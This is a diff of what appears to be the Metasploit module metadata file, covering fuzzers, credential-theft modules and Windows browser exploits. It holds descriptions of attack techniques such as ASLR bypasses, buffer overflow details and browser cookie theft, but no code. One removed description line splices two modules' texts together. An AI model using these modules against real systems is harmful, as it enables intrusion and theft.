- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19566,20 +19377,14 @@
"hdm "
],
"description": "This module sends a series of SSH requests with malicious version strings.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_2",
@@ -19587,19 +19392,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/ssh/ssh_version_corrupt": {
"name": "SSH Version Corruption",
"fullname": "auxiliary/fuzzers/ssh/ssh_version_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19607,20 +19413,14 @@
"hdm "
],
"description": "This module sends a series of SSH requests with a corrupted version string",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 22,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_corrupt",
@@ -19628,19 +19428,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/tds/tds_login_corrupt": {
"name": "TDS Protocol Login Request Corruption Fuzzer",
"fullname": "auxiliary/fuzzers/tds/tds_login_corrupt",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19648,9 +19449,7 @@
"hdm "
],
"description": "This module sends a series of malformed TDS login requests.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 1433,
@@ -19669,7 +19468,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_corrupt",
@@ -19677,19 +19476,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_fuzzers/tds/tds_login_username": {
"name": "TDS Protocol Login Request Username Fuzzer",
"fullname": "auxiliary/fuzzers/tds/tds_login_username",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19697,9 +19497,7 @@
"hdm "
],
"description": "This module sends a series of malformed TDS login requests.",
- "references": [
-
- ],
+ "references": [],
"platform": "",
"arch": "",
"rport": 1433,
@@ -19718,7 +19516,7 @@
"sybase"
],
"targets": null,
- "mod_time": "2017-07-24 06:26:21 +0000",
+ "mod_time": "2025-05-10 14:09:40 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_username",
@@ -19726,19 +19524,20 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Stability": [
+ "crash-service-down"
+ ],
+ "SideEffects": [],
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": {
"name": "Acronis Cyber Protect/Backup machine info disclosure",
"fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19793,16 +19592,12 @@
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": {
"name": "Adobe ColdFusion Unauthenticated Arbitrary File Read",
"fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -19848,22 +19643,16 @@
"artifacts-on-disk",
"ioc-in-logs"
],
- "Reliability": [
-
- ]
+ "Reliability": []
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/advantech_webaccess_creds": {
"name": "Advantech WebAccess 8.1 Post Authentication Credential Collector",
"fullname": "auxiliary/gather/advantech_webaccess_creds",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2017-01-21",
"type": "auxiliary",
@@ -19871,7 +19660,7 @@
"h00die",
"sinn3r "
],
- "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.",
+ "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.",
"references": [
"CVE-2016-5810",
"URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229"
@@ -19895,7 +19684,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb",
"is_install_path": true,
"ref_name": "gather/advantech_webaccess_creds",
@@ -19903,26 +19692,31 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/alienvault_iso27001_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"fullname": "auxiliary/gather/alienvault_iso27001_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-03-30",
"type": "auxiliary",
"author": [
"Brandon Perry "
],
- "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.",
+ "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.",
"references": [
"EDB-32644"
],
@@ -19945,7 +19739,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_iso27001_sqli",
@@ -19953,26 +19747,31 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/alienvault_newpolicyform_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"fullname": "auxiliary/gather/alienvault_newpolicyform_sqli",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2014-05-09",
"type": "auxiliary",
"author": [
"Chris Hebert "
],
- "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.",
+ "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.",
"references": [
"CVE-2014-5383",
"OSVDB-106815",
@@ -19998,7 +19797,7 @@
"https"
],
"targets": null,
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_newpolicyform_sqli",
@@ -20006,19 +19805,24 @@
"post_auth": true,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": false,
- "actions": [
-
- ]
+ "actions": []
},
"auxiliary_gather/android_browser_file_theft": {
"name": "Android Browser File Theft",
"fullname": "auxiliary/gather/android_browser_file_theft",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -20026,7 +19830,7 @@
"Rafay Baloch",
"joev "
],
- "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.",
+ "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.",
"references": [
"URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0",
"URL-https://bugs.chromium.org/p/chromium/issues/detail?id=90222"
@@ -20034,14 +19838,10 @@
"platform": "",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": null,
- "mod_time": "2022-01-23 15:28:32 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/auxiliary/gather/android_browser_file_theft.rb",
"is_install_path": true,
"ref_name": "gather/android_browser_file_theft",
@@ -20049,6 +19849,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": false,
@@ -20062,9 +19871,7 @@
"auxiliary_gather/android_browser_new_tab_cookie_theft": {
"name": "Android Browser \"Open in New Tab\" Cookie Theft",
"fullname": "auxiliary/gather/android_browser_new_tab_cookie_theft",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
@@ -20072,7 +19879,7 @@
"Rafay Baloch",
"joev "
],
- "description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.",
+ "description": "This exploit takes advantage of the \"Initialize and script ActiveX controls not\n marked safe for scripting\" setting within Internet Explorer. When this option is set,\n IE allows access to the WScript.Shell ActiveX control, which allows javascript to\n interact with the file system and run commands. This security flaw is not uncommon\n in corporate environments for the 'Intranet' or 'Trusted Site' zones.\n\n When set via domain policy, the most common registry entry to modify is HKLM\\\n Software\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1201,\n which if set to '0' forces ActiveX controls not marked safe for scripting to be\n enabled for the Intranet zone.\n\n This module creates a javascript/html hybrid that will render correctly either\n via a direct GET http://msf-server/ or as a javascript include, such as in:\n http://intranet-server/xss.asp?id=\">\n .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.",
"references": [
"URL-http://support.microsoft.com/kb/182569",
"URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html",
@@ -144837,16 +147618,12 @@
"platform": "Windows",
"arch": "x86",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows x86/x64"
],
- "mod_time": "2021-01-13 11:06:01 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb",
"is_install_path": true,
"ref_name": "windows/browser/ie_unsafe_scripting",
@@ -144854,6 +147631,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -144861,9 +147647,7 @@
"exploit_windows/browser/imgeviewer_tifmergemultifiles": {
"name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",
"fullname": "exploit/windows/browser/imgeviewer_tifmergemultifiles",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2010-03-03",
"type": "exploit",
@@ -144872,7 +147656,7 @@
"TecR0c ",
"mr_me "
],
- "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
+ "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.",
"references": [
"CVE-2010-5193",
"OSVDB-78102",
@@ -144883,18 +147667,14 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Internet Explorer 6/7",
"Internet Explorer 8 with JRE"
],
- "mod_time": "2023-03-23 10:19:30 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb",
"is_install_path": true,
"ref_name": "windows/browser/imgeviewer_tifmergemultifiles",
@@ -144902,6 +147682,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -144909,9 +147698,7 @@
"exploit_windows/browser/indusoft_issymbol_internationalseparator": {
"name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",
"fullname": "exploit/windows/browser/indusoft_issymbol_internationalseparator",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-04-28",
"type": "exploit",
@@ -144921,7 +147708,7 @@
"James Fitts ",
"juan vazquez "
],
- "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.",
+ "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.",
"references": [
"CVE-2011-0340",
"OSVDB-72865",
@@ -144932,12 +147719,8 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
@@ -144948,7 +147731,7 @@
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
- "mod_time": "2023-03-23 10:19:30 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb",
"is_install_path": true,
"ref_name": "windows/browser/indusoft_issymbol_internationalseparator",
@@ -144956,6 +147739,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -144963,9 +147755,7 @@
"exploit_windows/browser/inotes_dwa85w_bof": {
"name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",
"fullname": "exploit/windows/browser/inotes_dwa85w_bof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2012-06-01",
"type": "exploit",
@@ -144973,7 +147763,7 @@
"Gaurav Baruah",
"juan vazquez "
],
- "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.",
+ "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.",
"references": [
"CVE-2012-2175",
"OSVDB-82755",
@@ -144984,12 +147774,8 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
@@ -145000,7 +147786,7 @@
"IE 8 on Windows 7",
"IE 9 on Windows 7"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/inotes_dwa85w_bof",
@@ -145008,6 +147794,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145015,9 +147810,7 @@
"exploit_windows/browser/intrust_annotatex_add": {
"name": "Quest InTrust Annotation Objects Uninitialized Pointer",
"fullname": "exploit/windows/browser/intrust_annotatex_add",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 200,
"disclosure_date": "2012-03-28",
"type": "exploit",
@@ -145025,7 +147818,7 @@
"rgod ",
"mr_me "
],
- "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.",
+ "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. This will take some time in the users browser.",
"references": [
"CVE-2012-5896",
"OSVDB-80662",
@@ -145035,19 +147828,15 @@
"platform": "Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Automatic",
"Windows XP/Vista SP0-SP3 (IE6/IE7)",
"Windows XP SP0-SP3 DEP bypass (IE8)",
"Windows 7/Vista ALSR/DEP bypass (IE8)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/intrust_annotatex_add.rb",
"is_install_path": true,
"ref_name": "windows/browser/intrust_annotatex_add",
@@ -145055,6 +147844,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145062,9 +147860,7 @@
"exploit_windows/browser/java_basicservice_impl": {
"name": "Sun Java Web Start BasicServiceImpl Code Execution",
"fullname": "exploit/windows/browser/java_basicservice_impl",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2010-10-12",
"type": "exploit",
@@ -145072,7 +147868,7 @@
"Matthias Kaiser",
"egypt "
],
- "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"",
+ "description": "This module exploits a vulnerability in Java Runtime Environment\n that allows an attacker to escape the Java Sandbox. By injecting\n a parameter into a javaws call within the BasicServiceImpl class\n the default java sandbox policy file can be therefore overwritten.\n The vulnerability affects version 6 prior to update 22.\n\n NOTE: Exploiting this vulnerability causes several sinister-looking\n popup windows saying that Java is \"Downloading application.\"",
"references": [
"CVE-2010-3563",
"OSVDB-69043",
@@ -145081,17 +147877,13 @@
"platform": "Java,Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Windows x86",
"Generic (Java Payload)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_basicservice_impl.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_basicservice_impl",
@@ -145099,6 +147891,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145106,9 +147907,7 @@
"exploit_windows/browser/java_cmm": {
"name": "Java CMM Remote Code Execution",
"fullname": "exploit/windows/browser/java_cmm",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 300,
"disclosure_date": "2013-03-01",
"type": "exploit",
@@ -145116,29 +147915,25 @@
"Unknown",
"juan vazquez "
],
- "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.",
+ "description": "This module abuses the Color Management classes from a Java Applet to run\n arbitrary Java code outside of the sandbox as exploited in the wild in February\n and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41\n and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1\n systems. This exploit doesn't bypass click-to-play, so the user must accept the java\n warning in order to run the malicious applet.",
"references": [
"CVE-2013-1493",
"OSVDB-90737",
"BID-58238",
"URL-https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493",
"URL-http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html",
- "URL-http://pastie.org/pastes/6581034"
+ "URL-http://web.archive.org/web/20161013042610/http://pastie.org/pastes/6581034"
],
"platform": "Java,Windows",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Generic (Java Payload)",
"Windows x86 (Native Payload)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_cmm.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_cmm",
@@ -145146,6 +147941,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145153,9 +147957,7 @@
"exploit_windows/browser/java_codebase_trust": {
"name": "Sun Java Applet2ClassLoader Remote Code Execution",
"fullname": "exploit/windows/browser/java_codebase_trust",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 600,
"disclosure_date": "2011-02-15",
"type": "exploit",
@@ -145163,7 +147965,7 @@
"Frederic Hoguin",
"jduck "
],
- "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.",
+ "description": "This module exploits a vulnerability in the Java Runtime Environment\n that allows an attacker to run an applet outside of the Java Sandbox. When\n an applet is invoked with:\n\n 1. A \"codebase\" parameter that points at a trusted directory\n 2. A \"code\" parameter that is a URL that does not contain any dots\n\n the applet will run outside of the sandbox.\n\n This vulnerability affects JRE prior to version 6 update 24.",
"references": [
"CVE-2010-4452",
"OSVDB-71193",
@@ -145174,16 +147976,12 @@
"platform": "Java",
"arch": "",
"rport": null,
- "autofilter_ports": [
-
- ],
- "autofilter_services": [
-
- ],
+ "autofilter_ports": [],
+ "autofilter_services": [],
"targets": [
"Generic (Java Payload)"
],
- "mod_time": "2020-10-02 17:38:06 +0000",
+ "mod_time": "2025-06-23 12:43:46 +0000",
"path": "/modules/exploits/windows/browser/java_codebase_trust.rb",
"is_install_path": true,
"ref_name": "windows/browser/java_codebase_trust",
@@ -145191,6 +147989,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
+ "Reliability": [
+ "unknown-reliability"
+ ],
+ "Stability": [
+ "unknown-stability"
+ ],
+ "SideEffects": [
+ "unknown-side-effects"
+ ]
},
"session_types": false,
"needs_cleanup": null
@@ -145198,16 +148005,14 @@
"exploit_windows/browser/java_docbase_bof": {
"name": "Sun Java Runtime New Plugin docbase Buffer Overflow",
"fullname": "exploit/windows/browser/java_docbase_bof",
- "aliases": [
-
- ],
+ "aliases": [],
"rank": 500,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"jduck "
],
- "description": "This module exploits a flaw in the new plugin component of the Sun Java\n Runtime Environment before v6 Update 22. By specifying specific parameters\n to the new plugin, an attacker can cause a stack-based buffer overflow and\n execute arbitrary code.\n\n When the new plugin is invoked with a \"launchjnlp\" parameter, it will\n copy the contents of the \"docbase\" parameter to a stack-buffer using the\n \"sprintf\" function. A string of 396 bytes is enough to overflow the 256\n byte stack buffer and overwrite some local variables as well as the saved\n return address.\n\n NOTE: The string being copied is first passed through the \"WideCharToMultiByte\".\n Due to this, only characters which have a valid localized multibyte\n representation are allowed. Invalid characters will be replaced with\n question marks ('?').\n\n This vulnerability was originally discovered independently by both Stephen\n Fewer and Berend Jan Wever (SkyLined). Although exhaustive testing hasn't\n been done, all versions since version 6 Update 10 are believed to be affected\n by this vulnerability.\n\n This vulnerability was patched as part of the October 2010 Oracle Patch\n release.",
